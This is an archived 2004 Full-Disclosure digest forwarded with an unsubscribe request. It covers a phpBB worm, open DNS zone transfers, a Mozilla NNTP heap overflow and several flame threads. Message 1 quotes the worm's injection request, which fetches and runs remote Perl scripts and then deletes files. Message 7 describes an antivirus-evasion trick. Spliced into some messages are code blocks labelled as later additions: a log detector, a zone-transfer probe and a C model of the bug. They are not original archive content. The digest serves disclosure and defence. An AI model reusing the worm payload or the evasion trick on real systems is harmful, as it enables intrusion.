Full Disclosure mailing list archives

[Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144
From: <steve.dangerfield () syntegra com>
Date: Thu, 30 Dec 2004 15:34:13 -0000

Please unsubscribe me from this list

-----Original Message-----
From: full-disclosure-request () lists netsys com
[mailto:full-disclosure-request () lists netsys com] 
Sent: 30 December 2004 03:26
To: full-disclosure () lists netsys com
Subject: Full-disclosure Digest, Vol 1, Issue 2144

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists netsys com

You can reach the person managing the list at
        full-disclosure-owner () lists netsys com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Today's Topics:

   1. Re: Re: new phpBB worm affects 2.0.11 (Paul Laudanski)
   2. Re: Again: zone transfers, a spammer's dream? (Jorrit Kronjee)
   3. Re: Suspect phpBB users (Ron Brogden)
   4. Re: And you're proud of this Mike Evanchick? (Michael Reilly)
   5. Heap overflow in Mozilla Browser <= 1.7.3 NNTP code.
      (Maurycy Prodeus)
   6. Re: And you're proud of this Mike Evanchick? (Ill will)
   7. Re: And you're proud of this Mike Evanchick? (Michael Evanchik)
   8. Is that your password? (psirt () cisco com)
   9. Re: more: Isecom, osstm related: CRG was busted yesterday (Crg)
  10. RE: Multiple Backdoors found in eEye Products (IRIS and SecureIIS)
      (Marc Maiffret)
  11. Trivial Bug in Symantec Security Products (J. Oquendo)
  12. /bin/rm file access vulnerability (Lennart Hansen)
  13. Re: Multiple Backdoors found in eEye Products (IRIS and Secure
      (Lance Gusto)
  14. Re: /bin/rm file access vulnerability (Sean Harlow)
  15. MDKSA-2004:159 - Updated glibc packages fix temporary file
      vulnerability (Mandrake Linux Security Team)


----------------------------------------------------------------------

Message: 1
Date: Wed, 29 Dec 2004 12:42:42 -0500 (EST)
From: Paul Laudanski <zx () castlecops com>
Subject: Re: [Full-disclosure] Re: new phpBB worm affects 2.0.11
To: Adam <adam () fazed org>
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID:
        <Pine.LNX.4.44.0412291241030.25738-100000 () bugsbunny castlecops com>
Content-Type: TEXT/PLAIN; charset=US-ASCII

Here are some samples of what this one does, and some statistics on 
300,000 hits in 55 hours:

http://castlecops.com/article-5642-nested-0-0.html

On Sat, 25 Dec 2004, Adam wrote:

The request for this one (even against non-phpBB scripts) appears to 
look like this:

"GET /?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar/.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
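
The request quoted above is double URL-encoded, which hides what it does from a casual look at the logs. The following is an added example, not code from the post or from phpBB: it decodes the request the way the web server and then phpBB did, names the PHP function the highlight value injects and the parameter that carries the shell command, and runs that check over log lines. The Apache-style log lines are constructed for illustration (the first carries the request quoted above, reassembled onto one line); the detection logic is my own.

```python
"""Decoder/detector for the phpBB 'highlight' injection request quoted above.
Added example, not code from the post or from phpBB. The Apache-style log
lines below are constructed for illustration around the request quoted in
the message (reassembled onto one line); the detection logic is my own."""
import re
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = (
    '192.0.2.10 - - [25/Dec/2004:10:00:00 +0000] "GET /?p=comments&rush='
    '%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20crowklan.mine.nu/~pillar/'
    '.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar/.zk/aol;perl%20aol;'
    'rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F'
    '%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 512 "-" "Mozilla/4.0"\n'
    '192.0.2.11 - - [25/Dec/2004:10:00:01 +0000] "GET /viewtopic.php?t=7&highlight=don%27t '
    'HTTP/1.1" 200 8192 "-" "Mozilla/5.0"\n'
)

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# PHP calls an injected highlight value typically uses to run the carried command.
PHP_EXEC_RE = re.compile(r"\b(passthru|system|exec|shell_exec|popen|eval)\s*\(", re.I)
# The GET parameter the injected PHP reads its command from.
CARRIER_RE = re.compile(r"\$(?:HTTP_GET_VARS|_GET|_REQUEST)\[['\"]?(\w+)['\"]?\]")

def parse_query(query):
    """Split a query string on '&' and decode each key/value once, as the web
    server does. Done by hand so the ';' inside the payload is not treated as
    a separator (older urllib.parse.parse_qs versions split on it)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), unquote(value))
    return params

def classify_request(target):
    """Return a finding dict for a request target that abuses 'highlight', else None.
    The second unquote() mirrors the extra urldecode() phpBB applied to the
    parameter, which is what turns %2527 into a bare quote that closes the
    string inside the PHP phpBB generated."""
    params = parse_query(urlsplit(target).query)
    if "highlight" not in params:
        return None
    once = params["highlight"]
    twice = unquote(once)
    php = PHP_EXEC_RE.search(twice)
    # A legitimate search term may contain a quote after one decode ("don't");
    # only a quote that appears on the *second* decode indicates double encoding.
    if not php and not (twice != once and "'" in twice):
        return None
    carrier = CARRIER_RE.search(twice)
    name = carrier.group(1) if carrier else None
    return {
        "highlight": twice,
        "php_function": php.group(1) if php else None,
        "carrier_param": name,
        "shell_payload": params.get(name) if name else None,
    }

def scan_log(text):
    """Yield (line_number, finding) for each log line whose request is flagged."""
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            yield n, finding

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print("line %d: %s() via highlight, payload in '%s':\n  %s"
              % (n, f["php_function"], f["carrier_param"], f["shell_payload"]))
```

Run against a real access log the same `scan_log()` call applies; the second sample line shows why the check keys on the double decode rather than on a quote alone, so ordinary searches containing an apostrophe are not flagged.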





------------------------------

Message: 2
Date: Wed, 29 Dec 2004 19:49:46 +0100
From: Jorrit Kronjee <full-disclosure () nospam wafel org>
Subject: Re: [Full-disclosure] Again: zone transfers, a spammer's
        dream?
To: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID: <41D2FC4A.60702 () nospam wafel org>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Ralf Glauberman wrote:
Hello all,
after Lode Vermeiren having published on the 7th of December that many
tlds are transferable I did further research on this. Much to my
surprise this wasn't just a problem of little states. I did a complete
scan on all tlds (http://data.iana.org/TLD/tlds-alpha-by-domain.txt)
including every soa and ns server. I got results from 141 out of the
258 checked tlds. I didn't check every single output, but there are not
more than 10 false-positives within these. While the ca zone is secure
now, I was really surprised that be (~ 42 MB, ~ 900.000 records) and
fi (~ 11 MB, ~ 235.000 records) are transferable.
All in all, I found that the following tlds are transferable (also
there might be some false-positives):

arpa being one of those false positives (it's hardly exploitable by 
spammers anyway).

Although only a few nameservers of the tld allow zone transfers - and 
you really have to look for them - it really amazes me that these 
nameservers aren't properly configured.

I'm just glad I don't live in any of these countries.

Jorrit
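
The point made above, that only a few of a zone's nameservers allow transfers and you have to check each one, is easy to turn into a test. What follows is an added example, not code from the thread: an AXFR probe on raw sockets so the protocol is visible rather than hidden in a library. It sends one AXFR question over TCP to a given server and reads the verdict from the first reply message, where REFUSED or NOTAUTH means the server declined and NOERROR with answer records means it is handing the zone out. The wire format is RFC 1035; the server, zone and the reply bytes used in the test are constructed for illustration.

```python
"""Zone-transfer (AXFR) probe for one nameserver, on raw sockets so the
protocol is shown rather than hidden in a library. Added example, not code
from the thread. Wire format per RFC 1035; the names and the reply bytes
exercised in the test are constructed for illustration."""
import socket
import struct

QTYPE_AXFR = 252
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}

def encode_name(zone):
    """'be.' -> b'\\x02be\\x00' (RFC 1035 label encoding, no compression)."""
    out = b""
    for label in zone.rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_axfr_query(zone, txid=0x1234):
    """Header with all flags clear (AXFR is never recursive) plus one
    question of type AXFR, class IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1)

def parse_header(msg):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": flags >> 15, "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}

def classify_first_message(msg):
    """Verdict from the first reply message. A transfer may span many TCP
    messages, but the decision is visible in the first: NOERROR with at
    least one answer RR means the server has started sending the zone."""
    h = parse_header(msg)
    if h["rcode"] != 0:
        return RCODE_NAMES.get(h["rcode"], "RCODE%d" % h["rcode"])
    return "OPEN" if h["ancount"] > 0 else "EMPTY"

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf

def read_tcp_message(sock):
    """One length-prefixed DNS message from a TCP socket (RFC 1035 4.2.2)."""
    (length,) = struct.unpack("!H", _recv_exact(sock, 2))
    return _recv_exact(sock, length)

def probe_axfr(server, zone, timeout=5.0):
    """Return the verdict string for one server/zone pair (needs network)."""
    with socket.create_connection((server, 53), timeout=timeout) as s:
        q = build_axfr_query(zone)
        s.sendall(struct.pack("!H", len(q)) + q)
        return classify_first_message(read_tcp_message(s))

if __name__ == "__main__":
    import sys
    # usage: axfr_probe.py ZONE NS1 [NS2 ...]   check every NS of the zone
    zone, servers = sys.argv[1], sys.argv[2:]
    for ns in servers:
        try:
            print(ns, zone, probe_axfr(ns, zone))
        except (OSError, ConnectionError) as e:
            print(ns, zone, "ERROR", e)
```

Feed it the full NS set of the zone (from a normal NS lookup), not just the first server answering: a zone counts as transferable if any one of them says OPEN.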



------------------------------

Message: 3
Date: Wed, 29 Dec 2004 10:58:40 -0800
From: Ron Brogden <domains () islandnet com>
Subject: Re: [Full-disclosure] Suspect phpBB users
To: full-disclosure () lists netsys com
Message-ID: <200412291058.40811.domains () islandnet com>
Content-Type: text/plain;  charset="iso-8859-1"

On December 25, 2004 15:54, Jack Yan wrote:
    We have since upgraded, but among our new users over the last few days 
have been a Weber361, a Weber395, and a nderevyanko.

This looks like the fallout from a standard run of the mill spam bot.  The
point of its actions being to generate as many distinct links back to the
user's site as possible so as to increase their search engine placement. This
is similar to referrer spamming in HTTP logs - just in this case it is an
automated bot spamming forums instead of some other target.  I doubt it is
caused by a worm, more likely one or more machines running dedicated software
(though it is possible this is installed on zombie machines I suppose).

Cheers



------------------------------

Message: 4
Date: Wed, 29 Dec 2004 12:50:57 -0800
From: Michael Reilly <michaelr () cisco com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
To: Todd Towles <toddtowles () brookshires com>
Cc: full-disclosure () lists netsys com
Message-ID: <41D318B1.4070605 () cisco com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Couldn't help seconding this.  I do not understand the purpose of he 
original message.  I think Norton/Symantec did a good job.

michael
Todd Towles wrote:
Sounds like you need AV and a bit of network security. If you are scared
of IRC trojans and detectable viruses..then your time would be better
spent putting those systems into place. Don't you think?


________________________________

      From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle
Chicka
      Sent: Monday, December 27, 2004 11:16 PM
      To: full-disclosure () lists netsys com
      Subject: [Full-disclosure] And you're proud of this Mike
Evanchick?
      
      
      You so proudly posted this:
      ------------------------
      
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
      
      mike
      
      www.michaelevanchik.com
       
      ------------------------
      Obviously you are just tickled to see that the kiddies were able
to so quickly turn your point/click sploit code into a virus to wreak
havoc on my network.
      
      Thanks a lot for helping to make all of us a little less secure
over the holiday's.
       

      __________________________________________________
      Do You Yahoo!?
      Tired of spam? Yahoo! Mail has the best spam protection around 
      http://mail.yahoo.com 




------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
---- ---- ----
Michael Reilly    michaelr () cisco com
     Cisco Systems,  California


------------------------------

Message: 5
Date: Wed, 29 Dec 2004 22:24:21 +0100 (CET)
From: Maurycy Prodeus <z33d () isec pl>
Subject: [Full-disclosure] Heap overflow in Mozilla Browser <= 1.7.3
        NNTP code.
To: full-disclosure () lists netsys com
Cc: bugtraq () securityfocus com
Message-ID: <Pine.LNX.4.44.0412292222140.19156-200000 () isec pl>
Content-Type: text/plain; charset="us-ascii"




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. 
Product:   Mozilla Browser
Version:   <= 1.7.3
Vendor:    http://www.mozilla.org/
URL:       http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
CVE:       not assigned
Author:    Maurycy Prodeus <z33d () isec pl>
Date:      Dec 29, 2004



Issue:
======

A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.


Details:
========

Mozilla browser supports NNTP urls. The remote side is able to trigger a news://
connection to any server. I found a flaw in the NNTP handling code which may
cause a heap overflow and allow a remote attacker to execute arbitrary code on
the client machine.

Bogus function from nsNNTPProtocol.cpp:

char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
{
    char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);
    if (result)
    {
        char *resultPtr = result;
        while (1)
        {
            char ch = *commandSpecificData++;
            if (!ch)
                break;
            if (ch == '\\')
            {
                /* the next two bytes are fetched without checking
                   for the terminating NUL */
                char scratchBuf[3];
                scratchBuf[0] = (char) *commandSpecificData++;
                scratchBuf[1] = (char) *commandSpecificData++;
                scratchBuf[2] = '\0';
                int accum = 0;
                PR_sscanf(scratchBuf, "%X", &accum);
                *resultPtr++ = (char) accum;
            }
            else
                *resultPtr++ = ch;
        }
        *resultPtr = '\0';
    }
    return result;
}

When commandSpecificData points to the last character (the next one is NUL)
and that character is '\\', the copying loop may skip the terminator of the
source char array and overflow the result buffer.


Affected Versions
=================

Mozilla Browser <= 1.7.3 with mozilla-mail

Solution
=========

This bug is fixed in Mozilla 1.7.5. (Bug 264388)
Mozilla developer Dan Veditz claims that it cannot be exploited:
"A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;". 

On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code 
overflows the buffer using attacker-supplied data. I decided to make this
bug public because Mozilla Team hasn't warned users.


Exploitation
============

I have attached a proof of concept HTML file which causes heap corruption
and crashes the Mozilla 1.7.3 browser (with mozilla-mail). The news server
must exist and be available.


- -- 
Maurycy Prodeus
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFB0yCXC+8U3Z5wpu4RAgmGAKDrytVxxUc0vS/9+BZNf+P+lGyoLQCeL5wN
atw5z5/GvBsG9SVKWeGZSbk=
=eTqU
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/8cbaf9
f1/nntp_crash-0001.html
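
To make the trailing-backslash case concrete without corrupting a real heap, here is an added example (my own code, not Mozilla's or iSEC's): a model that walks the original loop's control flow over a caller-supplied window of bytes and counts what it would read past the terminator and write past the allocation, beside a bounds-checked rewrite of the function. PR_Malloc, PL_strlen and PR_sscanf are replaced by their libc equivalents, and the byte window in main() is constructed for illustration.

```c
/* Added example (not Mozilla or iSEC code): a bounds-checked rewrite of
 * MSG_UnEscapeSearchUrl next to an instrumented model of the original loop,
 * so the trailing-backslash case can be examined without touching real
 * memory past the string. PR_Malloc/PL_strlen/PR_sscanf are replaced by
 * their libc equivalents (assumption); the window in main() is constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct overread_report {
    size_t alloc_size;     /* strlen(s) + 1: what the original allocates     */
    size_t bytes_written;  /* bytes the original stores, incl. the final NUL */
    size_t reads_past_nul; /* source bytes consumed beyond the first NUL     */
    int    truncated;      /* 1 if the model ran out of `cap` bytes first    */
};

/* Walks the original loop over `cap` bytes (the string plus whatever would
 * follow it in memory) and counts reads and writes. Nothing is stored. */
struct overread_report model_original_loop(const unsigned char *buf, size_t cap)
{
    struct overread_report r = {0, 0, 0, 0};
    size_t nul = 0, i = 0;
    while (nul < cap && buf[nul] != '\0')
        nul++;
    r.alloc_size = nul + 1;
    for (;;) {
        if (i >= cap) { r.truncated = 1; return r; }
        unsigned char ch = buf[i];
        if (i > nul) r.reads_past_nul++;
        i++;
        if (!ch)
            break;
        if (ch == '\\') {
            /* the original fetches two more bytes without looking at them */
            for (int k = 0; k < 2; k++) {
                if (i >= cap) { r.truncated = 1; return r; }
                if (i > nul) r.reads_past_nul++;
                i++;
            }
        }
        r.bytes_written++;            /* one output byte either way */
    }
    r.bytes_written++;                /* terminating NUL */
    return r;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hardened version: indexes against the measured length, so a '\' that is
 * not followed by two hex digits (including one at the very end) is copied
 * literally instead of pulling bytes from past the terminator. Output is
 * never longer than input, so the len + 1 allocation always suffices. */
char *unescape_search_url_safe(const char *s)
{
    size_t len = strlen(s), i = 0;
    char *result = malloc(len + 1);
    if (!result)
        return NULL;
    char *out = result;
    while (i < len) {
        int hi, lo;
        if (s[i] == '\\' && i + 2 < len &&
            (hi = hexval((unsigned char)s[i + 1])) >= 0 &&
            (lo = hexval((unsigned char)s[i + 2])) >= 0) {
            *out++ = (char)(hi * 16 + lo);
            i += 3;
        } else {
            *out++ = s[i++];
        }
    }
    *out = '\0';
    return result;
}

int main(void)
{
    /* "abc\" followed by what happens to sit after it on the heap */
    const unsigned char window[] = { 'a', 'b', 'c', '\\', '\0', '4', '1', 'Z', '\0' };
    struct overread_report r = model_original_loop(window, sizeof window);
    printf("alloc=%zu written=%zu reads_past_nul=%zu\n",
           r.alloc_size, r.bytes_written, r.reads_past_nul);
    char *fixed = unescape_search_url_safe("abc\\41\\");
    printf("safe: %s\n", fixed);
    free(fixed);
    return 0;
}
```

The model shows the two halves of the disagreement above: after the backslash the loop keeps copying whatever follows the terminator until it meets another NUL, so the bytes written come from the neighbouring heap rather than the URL, and they are written past a buffer sized for the URL alone.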

------------------------------

Message: 6
Date: Wed, 29 Dec 2004 16:49:59 -0500
From: Ill will <xillwillx () gmail com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
Cc: full-disclosure () lists netsys com
Message-ID: <47fe50604122913491c574157 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII

quitcher bitchin and get to work


On Wed, 29 Dec 2004 08:48:24 -0600, Todd Towles
<toddtowles () brookshires com> wrote:
 
Sounds like you need AV and a bit of network security. If you are scared of
IRC trojans and detectable viruses..then your time would be better spent
putting those systems into place. Don't you think?
 
 
 ________________________________
 From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike Evanchick?

 
 
You so proudly posted this: 
------------------------ 
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

mike

www.michaelevanchik.com 
  
------------------------ 
Obviously you are just tickled to see that the kiddies were able to so
quickly turn your point/click sploit code into a virus to wreak havoc on my
network.
 
Thanks a lot for helping to make all of us a little less secure over the
holiday's. 
  






-- 
- illwill
http://illmob.org


------------------------------

Message: 7
Date: Wed, 29 Dec 2004 18:02:55 -0500
From: "Michael Evanchik" <Mike () MichaelEvanchik com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
        Evanchick?
To: "Todd Towles" <toddtowles () brookshires com>,      "Elle Chicka"
        <c1b3r_chick () yahoo com>, <full-disclosure () lists netsys com>
Message-ID: <01a701c4edfa$88578320$6702a8c0 () AlanPickel com>
Content-Type: text/plain; charset="iso-8859-1"

Todd,

Listen, you are so wrong I can't believe you even have the guts to post this.
How stupid can you be?  Norton or any AVP can easily be fooled.  The ActiveX
object "ca"+n b"+ +e crea" +ted" like this, the code changed around, or even
different local code can be used and tada, AVP is fooled.  Only a true patch
from Microsoft or disabling the help control in the registry is going to stop
this.  Her concern is wise.  

Mike
www.michaelevanchik.com

  ----- Original Message ----- 
  From: Todd Towles 
  To: Elle Chicka ; full-disclosure () lists netsys com 
  Sent: Wednesday, December 29, 2004 9:36 AM
  Subject: RE: [Full-disclosure] And you're proud of this Mike Evanchick?


  Well, if you have Norton, it couldn't wreak havoc...now could it? Most of
the AV companies are now detecting the exploit. This detection response is
much faster than most of the other exploits which are wreaking havoc on your
network, so it would sound.


  Nice work to Norton.



----------------------------------------------------------------------------
    From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
    Sent: Monday, December 27, 2004 11:16 PM
    To: full-disclosure () lists netsys com
    Subject: [Full-disclosure] And you're proud of this Mike Evanchick?


    You so proudly posted this:
    ------------------------
 
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

    mike

    www.michaelevanchik.com

    ------------------------
    Obviously you are just tickled to see that the kiddies were able to so
quickly turn your point/click sploit code into a virus to wreak havoc on my
network.

    Thanks a lot for helping to make all of us a little less secure over the
holiday's.

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/84b847
7d/attachment-0001.htm

------------------------------

Message: 8
Date: Wed, 29 Dec 2004 16:10:53 -0800
From: psirt () cisco com
Subject: [Full-disclosure] Is that your password?
To: full-disclosure () lists netsys com
Message-ID: <200412300010.iBU0AqvO028393 () lists netsys com>
Content-Type: text/plain; charset="windows-1252"

I have attached it to this mail.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: pwd02.txt.scr
Type: application/octet-stream
Size: 29568 bytes
Desc: not available
Url :
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/a40429
a2/pwd02.txt-0001.obj

------------------------------

Message: 9
Date: Thu, 30 Dec 2004 01:43:51 +0100
From: "Crg" <crg () digitalsec net>
Subject: Re: [Full-disclosure] more: Isecom, osstm related: CRG was
        busted yesterday
To: full-disclosure () lists netsys com
Message-ID: <006301c4ee08$d2342bc0$0302a8c0 () sia es>
Content-Type: text/plain;       charset="iso-8859-1"

Well, I'm not arrested; it seems to be just a hoax for the 28th of December
(it's like the 1st of April in Spain).



Keep the pr0j3kt alive
Best regards & xmas

Pedro Andujar (Crg)
!dSR - Digital Security Research
http://www.digitalsec.net

----------------------------------------------------------------------------
-------------------------

Author: your_momma () hushmail com
Date: 2004-12-28 02:33 +0100 (2004-12-28 01:33 UTC)
To: full-disclosure
CC:
Subject: [Full-disclosure] Isecom, osstm related: CRG was busted yesterday



 Flame wars are always bad wars. Yesterday one of us was busted by
police and !dsr homes were abused looking for profit incoming about
hacking isecom site.


 Crg was busted because of his curiosity, his funny way of
learning. He's not an enemy, he's harmless, had no weapon, not
like the people that took him when he was going to school. Isecom
can now be happy, another young boy hanged, time to make more cash
with their "hackers high school".


 At the moment we only know of one being arrested and two others under
search. Names were not specified, and families are being contacted
hardly without any kind of mercy because of Christmas time.


 We're tired of this.. Anger.. War is over.. we're about rolf the
whole planet.


 Stop playing with us!



------------------------------

Message: 10
Date: Wed, 29 Dec 2004 17:33:11 -0800
From: "Marc Maiffret" <mmaiffret () eeye com>
Subject: RE: [Full-disclosure] Multiple Backdoors found in eEye
        Products (IRIS and SecureIIS)
To: "Lance Gusto" <thegusto22 () hotmail com>,
        <vuln-dev () securityfocus com>,        <ntbugtraq () listserv ntbugtraq com>,
        <bugs () securitytracker com>,  <full-disclosure () lists netsys com>,
        <news-editor () securityfocus com>,     <press () net-security org>
Message-ID:
        <19F34051C5BB60429ACD1BF01338C598E9A975 () av-mail01 corp int-eeye com>
Content-Type: text/plain;       charset="us-ascii"

Hi Lance Gusto,

It is really interesting that someone with such a disdain for my company
would go out of their way to spam out an email about a supposed backdoor
within our products, choose not to contact us ahead of time, and then
provide no real details to prove your claim... Ahhh but wait, you chose
not to provide any details because you're a "good guy". As you said:
"Unfortunately, we can't release the "exploits" publicly due to the
severity of these flaws." Right.

The reason you could not provide any real details about these backdoors
are because there are no backdoors in Iris nor SecureIIS. 

While I would not wish to give someone like you the time of day nor 15
minutes of infamy, eEye does take every security claim very seriously.
We have performed an audit of SecureIIS and Iris code to re-verify what
we already knew, that there are no backdoors in either of them.

It is quite possible that you downloaded fake warez versions of our
products from peer-to-peer networks which someone might have put there
to trick people and put backdoors on their systems. However, if such
warez product versions existed they would not be from eEye as we do not
distribute our software on peer-to-peer networks nor recommend people
downloading warez versions from there.  Get your warez from a trusted
distributor. ;-) If you would have contacted us we could have saved you
the embarrassment... But then you are sending emails from Hotmail
through a proxy at a university in Germany so I seriously doubt you care
if your persona "Lance Gusto" gets embarrassed on public mailing lists.


These backdoors are as much of a reality as Santa Claus but then you
seem to be childish enough that you probably still believe in the jolly
red man. Maybe next you can follow up your humorous email with a spoofed
advisory about a backdoor you found in Rudolph "the red nosed reindeer".
At least then you could promote yourself from being a coward to a
comedian.

Thank you, please drive through.

Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9538
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities 

Important Notice: This email is confidential, may be legally privileged,
and is for the intended recipient only. Access, disclosure, copying,
distribution, or reliance on any of it by anyone else is prohibited and
may be a criminal offense.  Please delete if obtained in error and email
confirmation to the sender. P.S. I'm going to tell you this for your own
benefit, your email was dope as hell especially since you faked 90
percent of it. What you need to do is practice on your freestyle before
you come up missing like triple m's police file.

| -----Original Message-----
| From: full-disclosure-bounces () lists netsys com 
| [mailto:full-disclosure-bounces () lists netsys com] On Behalf 
| Of Lance Gusto
| Sent: Tuesday, December 28, 2004 8:12 PM
| To: vuln-dev () securityfocus com; 
| ntbugtraq () listserv ntbugtraq com; bugs () securitytracker com; 
| full-disclosure () lists netsys com; 
| news-editor () securityfocus com; press () net-security org
| Subject: [Full-disclosure] Multiple Backdoors found in eEye 
| Products (IRIS and SecureIIS)
| 
| Multiple Backdoors found in eEye Products (IRIS and 
| SecureIIS) L. Gusto <thegusto22 () hotmail com>
| 
| 
| Summary:
| 
| During meticulous testing of both eEye's IRIS and SecureIIS 
| products, we (my testing team) have discovered multiple 
| backdoors in the latest of both mentioned products and some 
| older versions we could acquire.
| 
| 
| These backdoors are very cleverly hidden (kudos to the 
| authors), I personally don't condone illegally backdooring 
| commercial products, and personally I don't think much of 
| eEye but I must give credit to where credit is due.
| 
| 
| We have tested IRIS 3.7 and up they all appear to have a backdoor.
| We have verified the IRIS backdoor doesn't exist in versions 
| prior to 3.0
| 
| 
| We have tested SecureIIS 2.0 and up they all appear to have a 
| backdoor.
| We have verified that SecureIIS 1.x series does not have this 
| specific backdoor.
| 
| Bringing the backdoors to light:
| 
| After long testing we discovered the exact sequences used to 
| activate the backdoor. Unfortunately, we can't release the 
| "exploits" publicly due to the severity of these flaws. But 
| incomplete examples will be given.
| 
| 
| 
| The IRIS Backdoor:
| 
| This one is quite interesting. We have discovered that 
| sending a specifically crafted UDP datagram to an IRIS host 
| *directly* (not through the wire or to host on the network 
| segment) with certain IP options set and a certain magic 
| value at an undisclosed offset in the payload will bind a 
| shell to the source port specified in the UDP datagram.
| 
| [snip]
| 
| 
| The SecureIIS Backdoor:
| 
| The SecureIIS backdoor was a lot easier to discover but very 
| well placed. The SecureIIS backdoor is triggered by a 
| specifically crafted HTTP HEAD request. Here is an incomplete 
| layout of how to exploit this:
| 
| 
| HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1
| 
| PORT          - Will be the port to bind a shell.
| ADDRESS               - Address for priority binding (0 - For any).
| 
| 
| [snip]
| 
| 
| 
| Local Deduction:
| 
| There are two possibilities here, either eEye's code has 
| been altered by some attacker or this has been sanctioned by 
| the company (or at least the developers were fully aware of this).
| 
| 
| 
| Conclusion:
| 
| It is very very shameful that a somewhat reputable company like eEye 
| is acting in a very childish, unprofessional manner. I figure 
| that is why the code is closed source. There are several 
| active exploits available that I (the author of this 
| advisory) didn't create floating around. The only logical 
| solution will be to not use the mentioned eEye products for 
| the time being or at least downgrade to the non-backdoored versions.
| 
| We will be investigating eEye's Blink Product for any 
| clandestine backdoors.
| 
| 



------------------------------

Message: 11
Date: Wed, 29 Dec 2004 17:56:28 -0500 (EST)
From: "J. Oquendo" <sil () infiltrated net>
